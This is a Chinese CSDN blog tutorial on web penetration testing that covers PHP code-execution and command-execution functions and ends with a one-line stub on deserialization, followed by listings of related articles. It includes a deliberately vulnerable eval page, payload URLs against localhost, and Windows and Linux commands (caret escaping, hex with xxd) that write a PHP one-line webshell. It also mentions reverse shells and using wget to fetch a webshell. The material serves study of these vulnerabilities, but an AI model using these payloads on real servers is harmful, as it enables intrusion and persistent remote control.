【web渗透】 RCE and 反序列化(第一弹)

已于 2024-09-14 17:30:02 修改
阅读量382 收藏 4
点赞数 6
文章标签: 前端 网络安全 安全 web
于 2024-09-14 17:29:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75588208/article/details/142263284
版权

目录

一、代码执行:

二、命令执行:

三、序列化:

一、代码执行:

  • PHP: eval、assert、system、preg_replace()、+/e模式(PHP版本<5.5.0)
  • Javascript: eval
  • Vbscript:Execute、Eval
  • Python: exec
  • 代码执行产生函数:eval,assert等,

code_eval.php:

<?php

$code=$_GET["name"];
eval($code);
?>

payload:http://127.0.0.1/code_eval.php?name=echo phpinfo();

eval():将这串代码以php执行

利用:

http://127.0.0.1/code_eval.php?name= echo ^<?php eval($_POST[pandas]); ?^> >C:/wwwroot/webshell.php

二、命令执行:

命令执行产生函数:exec,shell_exec,system,passthru等将参数以dos、shell执行

exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号` 实际上是使用shell_exec()函数,此外还要小心mail()函数的安全。

system() 输出并返回最后一行shell结果。

exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。

passthru() 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。

popen()、proc_open() 不会直接返回执行结果,而是返回一个文件指针

命令执行漏洞利用:

1、可尝试进行反弹shell,搭建服务执行wget下载webshell。

2、写入webshell:

利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义

假设需要写入<?php eval($_POST[wang]); ?>,方法如下:

Windows:

用^转义<,即执行echo ^<?php eval($_POST[kang]); ?^> > web

web可写目录加文件完整名字

Linux:

linux下需要用\来转义<,不过很多php都默认开启gpc(魔术引号magic_quotes_gpc())。可以先用16进制转换一句话再用xxd命令把16进制还原,命令如下:

echo 3c3f706870206576616c28245f504f53545b6b616e675d293b203f3e|xxd -r -ps > web

web可写目录加文件完整名字

三、序列化:

前面有%00用urlencode()

laZyGaaary
关注
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1539
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
2021总结web渗透测试岗位面试题(个人亲身经历的总结)
小羊的博客
11-26 6336
目录 1·拿到一个待检测的站,你觉得应该先做什么? 2·xss 3·sql注入 4·真实ip 5.多地ping 6·应急响应 7·代码注入漏洞 8·sql注入如何读写文件,二次注入,防御方式 9·csrf和xss区别 10·文件上传的后段绕过,防御方式 11·中间件漏洞——IIS、Apache、nginx、Lighttpd、Tomcat 12·xxe与ssrf 13·rce讲一下,php函数eval和system popen 14·缓冲区溢出 15·数据库提权(mysql,ms
Java代码审计&Shiro反序列化&CB1链&source入口&sink执行&gadget链
qq_46081990的博客
01-22 1885
本文详细介绍了Shiro550 Commons BeanUtils反序列化利用链,以代码审计的角度跟踪分析Commons BeanUtils链的source、sink以及gadget,解释了该链触发反序列化漏洞并最终造成RCE命令执行的根本原因是什么,并且在最后深入分析了Commons BeanUtils链payload的生成逻辑。
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl 链
Love&Share
02-26 5420
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl链原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名 Fastj.
反序列化漏洞详解 一文了解反序列化漏洞
闵行小鱼塘
11-13 5658
本篇总结归纳反序列化漏洞,包括php、java、python三种语言
V2022全栈培训笔记(WEB攻防47-WEB攻防-通用漏洞&Java反序列化&EXP生成&数据提取&组件安全
zzz6583zz的博客
05-05 993
综上所述,虽然 Java 反序列化和 PHP 反序列化存在一些不同,但它们都必须小心处理反序列化的输入数据,以避免导致安全漏洞。生成反序列化语句用来访问dnslog并保存到本地,当反序列化执行的对象为构造好的本地文件时,触发访问dnslog,造成信息外带。序列化器实现方式不同:Java 序列化器实现了。序列化格式不同:Java 使用了自己的序列化机制来支持对象的序列化和反序列化,而 PHP 通常使用基于文本的序列化格式(如。PHP的反序列化器则没有这样的限制,攻击者可以构造序列化数据来欺骗反序列化器。
.NET高级代码审计(第十课) ObjectStateFormatter反序列化漏洞
ahhacker86的专栏
12-26 1733
期待更多伙伴的加入!为了帮助研发大佬们熟悉和掌握.NET应用安全相关的漏洞介绍和修复解决方案,我们创建了一个.NET应用安全建设的星球,专门科普.NET领域相关的安全漏洞和提供漏洞修复方法,星球部分主题如下图所示。但是使用反序列化不受信任的二进制文件会导致反序列化漏洞从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍和复现。另外如果对.NET安全攻防技术研究和渗透感兴趣的朋友们,可以扫下面的dot.Net安全矩阵星球二维码,加入我们。.NET反序列化漏洞文章,欢迎大伙持续关注,交流。
Web.config在渗透中的作用
蚁景网安学院
01-20 728
前言 本文主要介绍web.config文件在渗透中的作用,即可上传一个web.config时的思路,话不多说,开始正题。首先我们来看一下web.config是什么,援引百度百科的介绍: ...
Web渗透测试-实战 方法 思路 总结
aming小老弟
01-29 5661
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
反序列化漏洞汇总
hackzkaq的博客
12-08 5165
一.反序列化的基本内容 类对象方法 类(Class): 用来描述具有相同的属性和方法的对象的集合。 它定义了该集合中每个对象所共有的属性和方法。对象是类的实例。 对象:通过类定义的数据结构实例。对象包括两个数据成员(类变量和实例变量)和方法。 对象:某一个具体的事物、实体或事例 类是类型,比如人类,犬类; 对象是某种类的一个实例(实际的例子),比如身为人类的你就是一个对象,你家养的狗就属于犬类的一个对象,或者说一个实例; 你可能经常会听到“实例化对象”,这句话的意思就是创建对象,此处的实例名词作动词用,作名
闲谈:渗透测试-红队版
weixin_43896582的博客
04-27 8771
闲谈:渗透测试-红队版第二篇Blind XSS漏洞反序列化攻击JavaScript 和远程代码执行服务器端请求伪造(SSRF)XML 外部实体攻击(XXE) 第二篇 短短的一生我们总会失去。你不妨大胆一些,攀一座山,追一个梦。 Blind XSS漏洞 见字知意,正如攻击的名称所表示的那样,攻击者/用户看不到存储的 XSS payload 的执行(无回显),只有管理员或后台员工才能看到。易被遗忘,可...
-webkit-box-reflect属性与倒影效果的实现
读心悦
09-13 432
是一个非标准的 CSS 属性,主要用于在 WebKit 浏览器(如 Chrome 和 Safari)中创建元素的倒影效果。这个属性并不是 CSS 规范的一部分,但在实践中经常被用来实现简单而有趣的视觉效果。
Vue使用query传参Boolean类型,刷新之后转换为String问题
q879936814的博客
09-12 430
要解决这个问题,不能直接Boolean处理,因为如果传入false,那么转换成字符串,Boolean(‘false’)会变成true;做项目时发现第一次进入页面时传参是正常的Boolean类型,刷新之后变成了String,这是浏览器进行的一次强制转换;解决方法:使用JSON.parse处理参数。
计算机毕业设计 基于SpringBoot的课程教学平台的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
weixin_19164791635
09-12 941
本文介绍了一款基于Java、SpringBoot和Vue.js技术的课程教学平台。该平台服务于管理员、学生和教师,提供教学资源管理、课程信息浏览、作业提交与批改等功能,旨在优化教学流程,提升教育质量,促进教育资源的数字化共享,推动教育信息化发展。
(微服务项目)新闻头条——Day1
weixin_73253843的博客
09-13 1142
(微服务项目)新闻头条——Day1
一文读懂 JS 中的 Set 结构
沐爸的博客
09-11 1020
Set 如何使用?和 Map 有什么区别?有哪些属性和方法?又有哪些使用场景?WeakMap 又是什么?
TypeScript 快速上⼿ (3:装饰器)
最新发布
每天都要努力学习哦~~
09-15 716
装饰器本质是一种特殊的函数,它可以对:类、属性、方法、参数进行扩展,同时能让代码更简洁。装饰器自2015年在中被提出到现在,已将近10年。截止目前,装饰器依然是实验性特性 ,需要开发者手动调整配置,来开启装饰器支持。装饰器有 5 种:1⃣类装饰器2⃣属性装饰器3⃣方法装饰器4⃣访问器装饰器5⃣参数装饰器备注:虽然中可以直接使用**类装饰器**,但为了确保其他装饰器可用,现阶段使用时,仍建议使用配置来开启装饰器支持,而且不排除在来的版本中,官方会进一步调整装饰器的相关语法!
反序列化 RCE 漏洞
06-09
反序列化RCE漏洞是一种常见的安全漏洞,发生在Java、Python等语言中的反序列化过程中。攻击者利用该漏洞,可以在受害者系统上执行任意命令,从而实现对系统的完全控制。 该漏洞的原理是,攻击者在序列化对象时,通过精心构造的恶意数据,将一段可执行代码序列化到对象中。当该对象被反序列化时,攻击者的恶意代码就会被执行,从而导致系统被攻击者掌控。 为了避免反序列化RCE漏洞的发生,开发者应该注意以下几点: 1. 对于不受信任的数据,不要直接进行反序列化操作,可以使用JSON等其他格式进行传输。 2. 对于需要进行反序列化操作的数据,应该进行严格的验证和过滤,防止恶意数据的注入。 3. 在反序列化过程中,可以对反序列化的类进行限制,只允许反序列化指定的类。 4. 及时更新相关的依赖库,以修复已知的反序列化RCE漏洞。 总之,反序列化RCE漏洞是一种非常危险的漏洞,开发者和用户都需要注意防范和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值